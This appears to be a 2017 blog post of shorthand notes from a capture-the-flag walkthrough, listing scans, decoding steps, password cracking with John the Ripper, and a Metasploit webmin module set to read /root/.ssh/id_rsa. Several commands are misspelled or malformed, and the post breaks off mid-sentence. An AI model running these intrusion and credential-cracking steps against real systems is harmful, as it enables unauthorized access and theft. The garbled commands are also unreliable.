Sunday, August 13, 2017



nmap -sV IP

visit the ip address

scan the webcontet using
dirb http://IP

check the folder - normally control, admin and check the
source code - FLAG number 1 founded = FL46_1

Binary code to converted into Decimal

netcat very verbrose
nc -vv IP - hexadecimal

brain fuck encoding

add the code.ctf to the /etc/hosts as
IP and filename.ctf

dirb http://g4m35.ctf/H3x6L64m3/ /usr/share/wordlists/dirb/big.txt
interpret as octal convert to text
without the \

to access another terminal - use grep* and password the ctf name

exiftool - into an image and analyze the content.

john –wordlist=/usr/share/wordlists/rockyou.txt donotstop
john --wordlist=/usr/share/wordlists/rockyou.txt ignite

ssh username@IP

rbash shell
suedoh -l

surdoh /usr/bin/wmstrt

for i in {i..9999..1};do echo $(suedoh /usr/bin/wmstrt&);done

msf> use auxiliary/admin/webmin/file_disclosure

msf> auxiliary (file_disclosure) > set lhost

msf> auxiliary (file_disclosure) > set ssl true

msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa

msf> auxiliary (file_disclosure) > exploit

ssh2john id_rsa> ignite
john --wordlist:/usr/share/wordlists/rockyou.txt ignite

nc -lp 1234 –vv

grep CTF

I used grep grep -i -r "string" /directory  -i to accept lowercase and uppercase  -r recursive __ look for all fol...